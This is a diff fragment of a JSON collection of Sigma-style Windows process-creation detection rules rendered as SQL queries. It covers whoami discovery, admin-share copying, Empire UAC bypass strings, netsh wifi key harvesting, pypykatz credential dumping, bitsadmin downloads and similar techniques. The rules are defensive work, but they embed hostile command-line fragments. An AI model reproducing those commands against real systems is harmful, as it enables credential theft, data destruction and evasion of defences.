"proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "status": "test", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "SC.EXE Query Execution", - "id": "57712d7a-679c-4a41-a913-87e7175ae429", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1007" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID", - "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_query.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", - "status": "experimental", - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "author": "omkar72", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "falsepositives": [ + "Other programs that cause these patterns (please report)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + }, + { + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_download_office_domain.yml" + }, + { + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ + "attack.command_and_control", + "attack.t1105", "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "status": "test", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hktl_pypykatz.yml" + }, + { + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali 